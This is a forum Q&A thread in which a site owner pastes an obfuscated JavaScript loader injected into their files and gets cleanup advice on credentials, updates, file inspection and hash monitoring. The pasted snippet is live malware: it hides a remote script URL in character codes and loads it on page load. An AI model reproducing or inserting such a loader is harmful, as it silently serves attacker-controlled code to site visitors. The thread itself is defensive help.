# Malware gdjfgjfgj235f

Tags: javascript

recently i noticed with my sites are injected by [this malware](https://blog.sucuri.net/2019/11/vulnerable-versions-of-adminer-as-a-universal-infection-vector.html). Interestingly I was not even using this plugin and it was able to affect all my files, including .php.

```
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
```

Can anyone help me protect my .js from injection? I use nginx!

Answer (score 1):

YOu need to do a full cleanup of your site, including

- changing all credentials (hosting, FTP, admin users)
- updating everything (WP, themes, plugins); perhaps even installing via FTP
- check every file for inserted code: index.php, wp-settings.php, wp-config.php
- change credentials on the database (strong passwords!)
- look at htaccess file, and any hidden files.

My procedure is here: https://www.securitydawg.com/recovering-from-a-hacked-wordpress-site/ . ANd there are some other articles to get rid of that particular one, but my procedure is a good start.

Good luck!

Comment: I would like a sed -i command that could recursively remove these lines of code from all files. You know how to do? I tried in many ways but I run into special characters.

Comment: Not very knowledgeable with command line editors. And the injected code is variable, so would be hard to make a good 'rule' or regex that would get everything that is injected. So the only way is to manually inspect each file for injected code. Or 'nuke from orbit'. I did make a utility that creates a hash for every file, stores that in a separate database, and reports on changes to files (because hash changes). It also looks for suspect code. The basic idea is here: https://www.securitydawg.com/identifying-possible-hacked-files-on-a-site/ .It helps point me to potential problems.